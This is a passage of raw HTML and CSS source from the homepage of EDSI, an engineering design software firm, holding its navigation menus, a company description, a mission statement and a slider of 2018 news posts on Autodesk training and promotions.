input[type="submit"]:hover,#apex-page-123 .mtphr-post-slider-header a:hover i,#apex-page-123 .mtphr-gallery-header a:hover i{background-color:#ffffff;}#apex-page-123 .apex-post-format-quote .entry-featured img,#apex-page-123 .apex-post-format-quote .entry-featured i,#apex-page-123 .apex-dnt-posts-quote-thumb img,#apex-page-123 .apex-dnt-posts-quote-thumb i,#apex-page-123 .entry-featured-overlay,#apex-page-123 article.format-quote .entry-featured img,#apex-page-123 article.format-quote .entry-featured i,#apex-page-123 .mtphr-dnt-post-format-quote .apex-dnt-posts-quote-thumb img,#apex-page-123 .mtphr-dnt-post-format-quote .apex-dnt-posts-quote-thumb i,#apex-page-123 .mtphr-dnt-twitter-tick .mtphr-dnt-twitter-avatar img,#apex-page-123 .mtphr-dnt-twitter-tick .mtphr-dnt-twitter-avatar i{background-color:#ffffff;}#apex-page-123 .apex-post-format-quote .entry-featured img,#apex-page-123 .apex-post-format-quote .entry-featured i,#apex-page-123 .apex-dnt-posts-quote-thumb img,#apex-page-123 .apex-dnt-posts-quote-thumb i,#apex-page-123 .entry-featured-overlay,#apex-page-123 article.format-quote .entry-featured img,#apex-page-123 article.format-quote .entry-featured i,#apex-page-123 .mtphr-dnt-post-format-quote .apex-dnt-posts-quote-thumb img,#apex-page-123 .mtphr-dnt-post-format-quote .apex-dnt-posts-quote-thumb i,#apex-page-123 .mtphr-dnt-twitter-tick .mtphr-dnt-twitter-avatar img,#apex-page-123 .mtphr-dnt-twitter-tick .mtphr-dnt-twitter-avatar i{background-color:rgba(255,255,255,0.8);}#apex-page-123 .mtphr-slide-graph-fill-bg{background-color:#ffffff;}#apex-page-123 .mtphr-slide-graph-fill-bg{background-color:rgba(255,255,255,0.2);}#apex-page-123 .apex-post-format-quote .entry-featured,#apex-page-123 .apex-dnt-posts-quote-thumb,#apex-page-123 blockquote,#apex-page-123 .form-control:focus,#apex-page-123 .ginput_container input:focus,#apex-page-123 .ginput_container select:focus,#apex-page-123 .ginput_container textarea:focus,#apex-page-123 .widget_archive a:hover span.count,#apex-page-123 .widget_categories a:hover span.count,#apex-page-123 .mtphr-gallery-categories a:hover span.count,#apex-page-123 .mtphr-rotator-footer a:hover,#apex-page-123 .tagcloud a:hover,#apex-page-123 article.format-quote .entry-featured,#apex-page-123.apex-post-format-quote .entry-featured,#apex-page-123 .mtphr-dnt-post-format-quote .apex-dnt-posts-quote-thumb,#apex-page-123 .mtphr-dnt-post-format-quote .apex-dnt-posts-quote-thumb,#apex-page-123 .mtphr-dnt-twitter-tick .mtphr-dnt-twitter-avatar,#apex-page-123 .btn,#apex-page-123 .gform_button,#apex-page-123 .comment-reply-link,#apex-page-123 .form-submit input[type="submit"],#apex-page-123 .btn:hover,#apex-page-123 .btn:active,#apex-page-123 .btn.active,#apex-page-123 .gform_button:hover,#apex-page-123 .gform_button:active,#apex-page-123 .gform_button.active,#apex-page-123 .gform_button:focus,#apex-page-123 .comment-reply-link:hover,#apex-page-123 .form-submit input[type="submit"]:hover,#apex-page-123 .mtphr-post-slider-header i,#apex-page-123 .mtphr-gallery-header i,#apex-page-123 .apex-style-dark .mtphr-dnt .mtphr-dnt-nav:hover,#apex-page-123 .content-nav li a:hover,#apex-page-123 #comment-nav li a:hover,#apex-page-123 .paginate-links a:hover span.paginate-links-number,#apex-page-123 .content-nav li span,#apex-page-123 #comment-nav li span,#apex-page-123 .paginate-links > span.paginate-links-number,#apex-page-123 .apex-icon i,#apex-page-123 .apex-icon-round .apex-icon{border-color:#ffffff;}#apex-page-123 .section-header-sep span{border-top-color:#ffffff;}#apex-page-123{background-color:#000000;}#apex-page-123{background-image:url(https://www.edsi.com/wp-content/uploads/2014/07/Medical_Building_Exterior_tablet-1400x788.jpg);}#apex-page-123 .apex-section-overlay{background-image:url(https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/images/overlays/06.png);}#apex-page-123 .apex-section-overlay{filter:alpha(opacity=91);-moz-opacity:0.91;-khtml-opacity:0.91;opacity:0.91;}</style><style id="apex-custom-styles">.apex-style-dark .apex-hero-menu-container a { color: #ffffff; background-color: #29abe2; } .apex-style-dark .apex-hero-menu-container a:hover { color: #36cbff !important; background-color: #ffffff; } .apex-style-dark .apex-hero-menu-container a i { color: #ffffff; } .apex-style-dark .apex-hero-menu-container a:hover i { color: #36cbff; } #logo img { max-height: none; height: 80px; /* You may or may not have to set a height, depending on your image size */ } .home #site-navigation { margin-top: 0px; } #site-navigation-contents { padding-top: 6px; padding-bottom: 13px; } #mobile-menu-toggle { margin-top: 30px; } .apex-primary-menu-container { top: 94px; } @media (min-width: 768px) { #site-navigation-contents { padding-top: 6px; padding-bottom: 13px; } .apex-primary-menu-container { top: auto; padding-top: 30px !important; } .apex-primary-menu-container li { margin-left: 20px; } .apex-primary-menu-container ul ul { padding-top: 40px; } } @media (min-width: 992px) { .apex-primary-menu-container li { margin-left: 28px; } } .apex-header { display: -webkit-box; display: -moz-box; display: box; display: -webkit-flex; display: -moz-flex; display: -ms-flexbox; display: flex; -webkit-box-orient: vertical; -moz-box-orient: vertical; box-orient: vertical; -webkit-box-direction: normal; -moz-box-direction: normal; box-direction: normal; -webkit-flex-direction: column; -moz-flex-direction: column; flex-direction: column; -ms-flex-direction: column; -webkit-box-align: center; -moz-box-align: center; box-align: center; -webkit-align-items: center; -moz-align-items: center; -ms-align-items: center; -o-align-items: center; align-items: center; -ms-flex-align: center; -webkit-box-pack: center; -moz-box-pack: center; box-pack: center; -webkit-justify-content: center; -moz-justify-content: center; -ms-justify-content: center; -o-justify-content: center; justify-content: center; -ms-flex-pack: center; height: calc(100vh - 100px); } .apex-header .section-tagline { margin-bottom: 0; } .wpcf7-form { color: #ffffff; } .fl-row fl-row-full-width fl-row-bg-photo fl-node-58a36648cb7c8 { width: 100%; } .apex-header .apex-section-overlay { top: 0; } .bullet-trick ul li { color: red; } .apex-hero-menu-container ul { display: flex; align-items: center; justify-content: center; flex-wrap: wrap; } .apex-hero-menu-container ul li { display: block; } .mtphr-dnt-tick-contents { font-size: 15px; }</style> <script type="text/javascript"> var ajaxurl = 'https://www.edsi.com/wp-admin/admin-ajax.php'; </script> <!-- BEGIN GADWP v5.3.2 Universal Analytics - https://deconf.com/google-analytics-dashboard-wordpress/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-97179514-1', 'auto'); ga('send', 'pageview'); </script> <!-- END GADWP Universal Analytics --> <style type="text/css" id="wp-custom-css"> .form-group { color: #0a50a1; } .bullet-trick ul li { color: #ffffff; } </style> </head> <body class="home page-template-default page page-id-125 fl-builder"> <div id="apex-page-125-hero" class="apex-hero apex-style-dark" > <div id="apex-hero-inner"> <div id="hero-bg-rotator"><div id="mtphr-dnt-179-apex-hero" class="mtphr-dnt mtphr-dnt-179 mtphr-dnt-image mtphr-dnt-rotate mtphr-dnt-rotate-fade"><div class="mtphr-dnt-wrapper mtphr-dnt-clearfix"><div class="mtphr-dnt-tick-container"><div class="mtphr-dnt-tick-contents"><div class="mtphr-dnt-tick mtphr-dnt-image-tick mtphr-dnt-clearfix "><div class="mtphr-rotator-resource" style="background-image:url(https://www.edsi.com/wp-content/uploads/2017/03/HomepageFirstWeb-1400x934.jpg);" data-mtphr-parallax-speed="6"></div></div><div class="mtphr-dnt-tick mtphr-dnt-image-tick mtphr-dnt-clearfix "><div class="mtphr-rotator-resource" style="background-image:url(https://www.edsi.com/wp-content/uploads/2016/10/Auto-Simulation-Indy-Car-04.jpg-1400x788.jpg);" data-mtphr-parallax-speed="6"></div></div><div class="mtphr-dnt-tick mtphr-dnt-image-tick mtphr-dnt-clearfix "><div class="mtphr-rotator-resource" style="background-image:url(https://www.edsi.com/wp-content/uploads/2016/10/Medical-Building-Exterior.jpg-1400x788.jpg);" data-mtphr-parallax-speed="6"></div></div></div></div></div></div></div> <div id="apex-hero-gradient"></div> <div id="apex-hero-overlay"></div> <div class="container"> <div class="apex-hero-content"> <div id="hero-rotator" class="apex-hero-element"><div id="mtphr-dnt-178-apex-hero" class="mtphr-dnt mtphr-dnt-178 mtphr-dnt-default mtphr-dnt-rotate mtphr-dnt-rotate-slide_up"><div class="mtphr-dnt-wrapper mtphr-dnt-clearfix"><div class="mtphr-dnt-tick-container"><div class="mtphr-dnt-tick-contents"><div class="mtphr-dnt-tick mtphr-dnt-default-tick mtphr-dnt-clearfix "><a href="https://www.microcad3d.com/edsi/" target="_blank">MICROCAD AND EDSI UNITE: SEE PRESS RELEASE</a></div></div></div></div></div></div> <nav class="apex-hero-menu-container apex-hero-element"><ul id="menu-icons" class="apex-hero-menu clearfix"><li id="menu-item-467" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-467"><a href="https://www.edsi.com/infrastructure/"><i class="mtphr-shortcodes-ico-road-sign"></i>Infrastructure</a></li> <li id="menu-item-466" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-466"><a href="https://www.edsi.com/building/"><i class="mtphr-shortcodes-ico-university"></i>Building</a></li> <li id="menu-item-638" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-638"><a href="https://www.edsi.com/autocad-manufacturing/"><i class="mtphr-shortcodes-ico-box-open"></i>Manufacturing</a></li> <li id="menu-item-639" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-639"><a href="https://www.edsi.com/autocad-data-management/"><i class="mtphr-shortcodes-ico-graph-chart-2"></i>Data Management</a></li> <li id="menu-item-948" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-948"><a href="https://www.edsi.com/autocad-gis/"><i class="apex-icon-gear-1"></i>GIS</a></li> </ul></nav> </div> </div> </div> </div> <header id="site-navigation" class="apex-style-light"> <div id="site-navigation-contents"> <div class="container"> <a href="http://www.microcad3d.com" target="_blank"><img style="max-width: 400px;" src="https://www.edsi.com/wp-content/uploads/2019/04/LogoEDSIMTC.jpg" width="400"></a> <a id="mobile-menu-toggle" href="#"><i class="apex-icon-mobile-menu"></i></a> <nav class="apex-primary-menu-container"><ul id="menu-main-menu" class="apex-primary-menu clearfix"><li id="menu-item-433" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-125 current_page_item menu-item-433"><a href="https://www.edsi.com/"><i class="apex-icon-link-1"></i>Home</a></li> <li id="menu-item-758" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-758"><a href="/infrastructure"><i class="apex-icon-gear-1"></i>Industries</a> <ul class="sub-menu"> <li id="menu-item-849" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-849"><a href="/infrastructure"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>Infrastructure</a> <ul class="sub-menu"> <li id="menu-item-857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-857"><a href="https://www.edsi.com/infrastructure/"><i class="apex-icon-circle"></i>Infrastructure Services</a></li> <li id="menu-item-848" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-848"><a href="https://www.edsi.com/infrastructure-products-edsi/"><i class="apex-icon-circle"></i>Infrastructure Products</a></li> </ul> </li> <li id="menu-item-850" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-850"><a href="/building"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>Building</a> <ul class="sub-menu"> <li id="menu-item-854" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-854"><a href="https://www.edsi.com/building/"><i class="apex-icon-circle"></i>Building Services</a></li> <li id="menu-item-847" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-847"><a href="https://www.edsi.com/building-products-edsi-2/"><i class="apex-icon-circle"></i>Building Products</a></li> </ul> </li> <li id="menu-item-851" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-851"><a href="/autocad-manufacturing/"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>Manufacturing</a> <ul class="sub-menu"> <li id="menu-item-858" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-858"><a href="https://www.edsi.com/autocad-manufacturing/"><i class="apex-icon-circle"></i>Manufacturing Services</a></li> <li id="menu-item-846" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-846"><a href="https://www.edsi.com/autocad-manufacturing-products-2/"><i class="apex-icon-circle"></i>Manufacturing Products</a></li> </ul> </li> <li id="menu-item-852" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-852"><a href="/autocad-data-management/"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>Data Management</a> <ul class="sub-menu"> <li id="menu-item-855" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-855"><a href="https://www.edsi.com/autocad-data-management/"><i class="apex-icon-circle"></i>Data Management Services</a></li> <li id="menu-item-845" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-845"><a href="https://www.edsi.com/autocad-data-management-products-2/"><i class="apex-icon-circle"></i>Data Management Products</a></li> </ul> </li> <li id="menu-item-853" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-853"><a href="/autocad-gis/"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>GIS</a> <ul class="sub-menu"> <li id="menu-item-856" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-856"><a href="https://www.edsi.com/autocad-gis/"><i class="apex-icon-circle"></i>GIS Services</a></li> <li id="menu-item-844" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-844"><a href="https://www.edsi.com/autocad-gis-products-2/"><i class="apex-icon-circle"></i>GIS Products</a></li> </ul> </li> </ul> </li> <li id="menu-item-828" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-828"><a href="https://www.edsi.com/services-4/"><i class="apex-icon-gear-1"></i>Services</a></li> <li id="menu-item-609" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-609"><a href="https://www.edsi.com/about/"><i class="apex-icon-gear-1"></i>About Us</a></li> <li id="menu-item-902" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-902"><a href="/blog-2"><i class="apex-icon-gear-1"></i>News</a> <ul class="sub-menu"> <li id="menu-item-427" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-427"><a href="https://www.edsi.com/blog-2/"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>Blog</a></li> <li id="menu-item-574" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-574"><a target="_blank" href="https://www.edsi.com/end-of-year-promotions-2018/"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>Promotions</a></li> <li id="menu-item-754" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-754"><a href="https://www.edsi.com/subscriptions/"><span class="sub-menu-arrow"></span><i class="apex-icon-circle"></i>Subscriptions</a></li> </ul> </li> <li id="menu-item-749" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-749"><a href="https://www.edsi.com/contact-edsi-today/"><i class="apex-icon-gear-1"></i>Contact</a></li> </ul></nav> </div><!-- .container --> </div><!-- #site-navigation-contents --> </header><!-- #site-navigation --> <div id="wrapper"> <div id="main" role="main"> <section id="apex-page-125" class="apex-section apex-section-page apex-layout-full-width apex-width-normal apex-style-light apex-mobile-sidebar-default" > <div class="apex-section-overlay"></div> <div class="apex-section-inner"> <div class="container"> <div class="wow fadeIn row" data-wow-delay=".25"> <div class="col-sm-12 primary"> <article> <div class="entry-content clearfix"> <div class='mailmunch-forms-before-post' style='display: none !important;'></div><div class="fl-builder-content fl-builder-content-125 fl-builder-content-primary" data-post-id="125"></div></p><div class='mailmunch-forms-in-post-middle' style='display: none !important;'></div><div class='mailmunch-forms-after-post' style='display: none !important;'></div> </div><!-- .entry-content --> </article> </div><!-- .primary --> </div> </div> </div> </section> <section id="apex-page-133" class="apex-section apex-section-page apex-layout-full-width apex-width-condensed apex-style-light apex-mobile-sidebar-default" > <div class="apex-section-overlay"></div> <div class="apex-section-inner"> <div class="container"> <div class="wow fadeIn row" data-wow-delay=".25"> <div class="col-sm-12 col-md-10 col-md-offset-1 primary"> <article> <div class="entry-content clearfix"> <div class='mailmunch-forms-before-post' style='display: none !important;'></div> <p> <div class="mtphr-shortcodes-row-responsive"><div class="mtphr-shortcodes-grid6"> <p><img src="https://www.edsi.com/wp-content/uploads/2014/07/MFG_PIP-01-2.png" alt="mfg_pip-01-2" width="600" height="345" /></p> </div><div class="mtphr-shortcodes-grid6" data-wow-delay=".25s"> <h1>About EDSI</h1> <p>Engineering Design Systems, Inc. (EDSI) is an organization that specializes in helping firms leverage design applications to achieve their goals and objectives. Our holistic approach centers on understanding your organization, people, and processes and working with your team to develop achievable solutions and measurable results.</p> <div class='mailmunch-forms-in-post-middle' style='display: none !important;'></div> <p><a href="#">Learn More</a></p> </div></div></p> <p> <iframe width="1120" height="630" src="https://www.youtube.com/embed/qGEzF6mPx0Q?rel=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe> </p> <div class='mailmunch-forms-after-post' style='display: none !important;'></div> </div><!-- .entry-content --> </article> </div><!-- .primary --> </div> </div> </div> </section> <section id="apex-ditty_news_ticker-389" class="apex-section apex-section-ditty_news_ticker apex-layout-full-width apex-width-wide apex-style-dark apex-mobile-sidebar-default" data-mtphr-parallax-speed="6"> <div class="apex-section-overlay"></div> <div class="apex-section-inner"> <div class="container"> <div class="wow fadeIn row" data-wow-delay=".25"> <div class="col-sm-12 primary"> <article> <div class="entry-content clearfix"> <p><div id="mtphr-dnt-389" class="mtphr-dnt mtphr-dnt-389 mtphr-dnt-posts mtphr-dnt-rotate mtphr-dnt-rotate-slide_left"><div class="mtphr-dnt-wrapper mtphr-dnt-clearfix"><div class="mtphr-dnt-tick-container"><div class="mtphr-dnt-tick-contents"><div class="mtphr-dnt-tick mtphr-dnt-posts-tick mtphr-dnt-clearfix "><div class="mtphr-dnt-post mtphr-dnt-post-187 mtphr-dnt-post-type-post mtphr-dnt-post-format-quote mtphr-dnt-post-category-apex-quotes mtphr-dnt-post-category-quote mtphr-dnt-post-post_tag-design mtphr-dnt-post-post_format-post-format-quote"><span class="apex-dnt-posts-quote-thumb"><i class="apex-icon-quotes"></i></span><div class="mtphr-dnt-posts-content"><div class='mailmunch-forms-before-post' style='display: none !important;'></div> <p>We realize and actualize your vision by providing the expertise, service, and support for your competitive advantage.</p> <div class='mailmunch-forms-in-post-middle' style='display: none !important;'></div> <div class='mailmunch-forms-after-post' style='display: none !important;'></div> </div><h4 class="mtphr-dnt-posts-title">EDSI Mission Statement</h4></div></div></div></div></div></div></p> </div><!-- .entry-content --> </article> </div><!-- .primary --> </div> </div> </div> </section> <section id="apex-page-139" class="apex-section apex-section-page apex-layout-full-width apex-width-normal apex-style-light apex-mobile-sidebar-default apex-template-pgtemp-posts-php" > <div class="apex-section-overlay"></div> <div class="apex-section-inner"> <div class="container"> <div class="section-header wow fadeIn" data-wow-delay=".25"><h1 class="section-title">News</h1><div class="section-header-sep"><span></span></div><h2 class="section-tagline">Find out what’s happening at EDSI</h2></div> <div class="wow fadeIn row" data-wow-delay=".25"> <div class="col-sm-12 primary"> <article> <div class="entry-content"> <div class='mailmunch-forms-before-post' style='display: none !important;'></div> <div class='mailmunch-forms-in-post-middle' style='display: none !important;'></div> <div class='mailmunch-forms-after-post' style='display: none !important;'></div> <div id="mtphr-post-slider-1515783aaa5acca681569b2d8063420f" class="mtphr-post-slider mtphr-post-slider-post mtphr-clearfix "> <div class="mtphr-post-slider-header mtphr-clearfix"> <div class="mtphr-post-slider-navigation mtphr-clearfix"> <a class="mtphr-post-slider-prev disabled" href="#"><i class="apex-icon-arrow-left-1"></i></a> <a class="mtphr-post-slider-next" href="#"><i class="apex-icon-arrow-right-1"></i></a> </div> </div> <div class="mtphr-post-slider-content-wrapper"> <div class="mtphr-post-slider-content mtphr-clearfix"> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/12/Copy-of-Copy-of-AUS-LinkedIn-Picture-1-370x280.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="Autodesk Utilization Services AUS Certified" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/aus-training/" title="Permalink to AUS Training &#038; Certification" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">December 11, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/aus-training/">AUS Training &#038; Certification</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Autodesk Utilization Services AUS Training? Our Sales team and Technical Support staff have been&nbsp;Autodesk Utilization Services, AUS, ce<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/aus-training/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/12/blur-close-up-cold-813872-370x280.jpg" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="year-end offers" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/2018-year-end-offers/" title="Permalink to 2018 Year End Offers" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">December 7, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/2018-year-end-offers/">2018 Year End Offers</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">2018 Year-End Offers Start the New Year with the tools you need With many resolutions to be made, why not do the same with your software and<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/2018-year-end-offers/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/11/arrangement-autumn-autumn-colours-1484254-370x280.jpg" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="end of year promotions" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/end-of-year-promotions-2018/" title="Permalink to End of Year Promotions" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">November 21, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/end-of-year-promotions-2018/">End of Year Promotions</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">2018 End of Year Promotions Product Design &amp; Manufacturing Collection subscribers can save up to 25% off companion software in same tran<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/end-of-year-promotions-2018/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/10/Copy-of-Social-Post-Event-Ad-370x280.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="Autodesk Account License Management" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/autodesk-account-consultation/" title="Permalink to License Management with Autodesk Account &#8211; Personalized Consultation" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">October 18, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/autodesk-account-consultation/">License Management with Autodesk Account &#8211; Personalized Consultation</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">License Management with Autodesk Account Amp Up Your License Management Skills with an Autodesk Account Tutorial and Coffee on Us Understand<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/autodesk-account-consultation/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="200" src="https://www.edsi.com/wp-content/uploads/2018/09/email-header-370x200.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="conceptual model design" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/conceptual-model-design/" title="Permalink to Conceptual Model to Design" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">September 13, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/conceptual-model-design/">Conceptual Model to Design</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Conceptual Model Design to Full Design Lecture for the WV AIA - September 21 Our industry experts, Mariah Roth &amp; Rex Thaxton, are very e<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/conceptual-model-design/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/08/BLOG-BANNER-BIM-360-Design-1-370x280.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="What is BIM 360 Design?" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/bim-360-design/" title="Permalink to BIM 360 Design" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">September 4, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/bim-360-design/">BIM 360 Design</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">&nbsp; Collaboration for Revit is now BIM 360 Design BIM 360 Design is the newest generation of Autodesk’s work-sharing and collaboration so<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/bim-360-design/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/aec-design-tech/" title="Permalink to AEC Design Tech &#8211; TN" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">August 24, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/aec-design-tech/">AEC Design Tech &#8211; TN</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">AEC Design Tech Thank You! We had a great AEC Design Tech event in Chattanooga! Thank you! After an enjoyable AEC Design Tech event Wednesda<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/aec-design-tech/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/08/DJOliver-370x280.jpg" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/marketing-interns/" title="Permalink to EDSI Marketing Interns 2018" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">August 8, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i 